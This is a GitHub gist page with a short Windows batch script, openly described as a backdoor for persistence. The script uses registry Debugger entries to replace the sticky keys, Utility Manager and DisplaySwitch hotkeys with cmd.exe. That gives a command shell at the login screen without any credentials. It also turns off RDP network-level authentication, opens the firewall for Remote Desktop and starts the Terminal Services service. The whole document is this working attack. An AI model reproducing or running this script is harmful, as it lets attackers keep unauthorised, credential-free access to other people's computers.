Skip to content

Instantly share code, notes, and snippets.

@tuantmb

tuantmb/sticky_keys_persitence.bat

Forked from ahhh/sticky_keys_persitence.bat
Created December 31, 2020 01:29
Show Gist options
  • Star 0 You must be signed in to star a gist
  • Fork 0 You must be signed in to fork a gist
  • Save tuantmb/dff5f5bd77f60f54cd0d48d4e12a4a70 to your computer and use it in GitHub Desktop.
Save tuantmb/dff5f5bd77f60f54cd0d48d4e12a4a70 to your computer and use it in GitHub Desktop.
Download ZIP
Batch script to launch a cmd backdoor when stickykeys, utiliman, or display keyboard hotkeys are toggled. Also starts RDP.
Raw
sticky_keys_persitence.bat
REG ADD "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\sethc.exe" /v Debugger /t REG_SZ /d "C:\windows\system32\cmd.exe" /f
REG ADD "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\Utilman.exe" /v Debugger /t REG_SZ /d "C:\windows\system32\cmd.exe" /f
REG ADD "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\DisplaySwitch.exe" /v Debugger /t REG_SZ /d "C:\windows\system32\cmd.exe" /f
REG ADD "HKLM\SYSTEM\CurrentControlSet\Control\Terminal Server\WinStations\RDP-Tcp" /v UserAuthentication /t REG_DWORD /d 0 /f
netsh firewall set service type = remotedesktop mode = enable
netsh advfirewall firewall set rule group="remote desktop" new enable=Yes
net start TermService
Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment